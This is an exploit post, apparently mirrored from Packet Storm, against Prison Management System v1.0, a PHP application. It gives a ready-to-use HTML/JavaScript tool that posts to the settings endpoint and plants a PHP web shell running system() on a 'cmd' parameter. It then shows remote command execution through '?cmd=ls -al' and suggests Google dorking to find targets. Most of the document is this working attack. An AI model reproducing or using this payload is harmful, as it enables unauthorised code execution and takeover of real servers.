Share
## https://sploitus.com/exploit?id=PACKETSTORM:181626
=============================================================================================================================================  
| # Title : Prison Management System v1.0 php code injection Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |  
| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/PHP-pms.zip |  
=============================================================================================================================================  
  
poc :  
  
[+] Dorking ฤฐn Google Or Other Search Enggine.  
  
[+] This HTML page is designed to create a file and inject PHP code.  
  
[+] save payload as poc.html   
  
[+] In the line 13 , 'content[welcome]' name the file you want to create It will create a file with an HTML extension.   
  
and in the same line, put the payload that suits you.  
  
[+] Set your target url  
  
[+] payload :   
  
  
<!DOCTYPE html>  
<html lang="en">  
<head>  
<meta charset="UTF-8">  
<meta name="viewport" content="width=device-width, initial-scale=1.0">  
<title> PHP code injection Tool</title>  
<script>  
async function sendRequest() {  
const url = document.getElementById('url').value;  
const postData = {  
'content[welcome]': `<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>`  
};  
  
try {  
const response = await fetch(`${url}/classes/SystemSettings.php?f=update_settings`, {  
method: 'POST',  
headers: {  
'Content-Type': 'application/x-www-form-urlencoded'  
},  
body: new URLSearchParams(postData).toString()  
});  
  
if (response.ok) {  
document.getElementById('result').innerText = '[+] Injection in welcome page\n[+] ' + url + '/?cmd=ls -al\n';  
  
} else {  
document.getElementById('result').innerText = 'Error: ' + response.statusText;  
}  
} catch (error) {  
document.getElementById('result').innerText = 'Error making request: ' + error.message;  
}  
}  
</script>  
</head>  
<body>  
<h1>Injection Tool</h1>  
<form onsubmit="event.preventDefault(); sendRequest();">  
<label for="url">Enter URL:</label>  
<input type="text" id="url" name="url" required>  
<button type="submit">Submit</button>  
</form>  
<pre id="result"></pre>  
</body>  
</html>  
  
Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================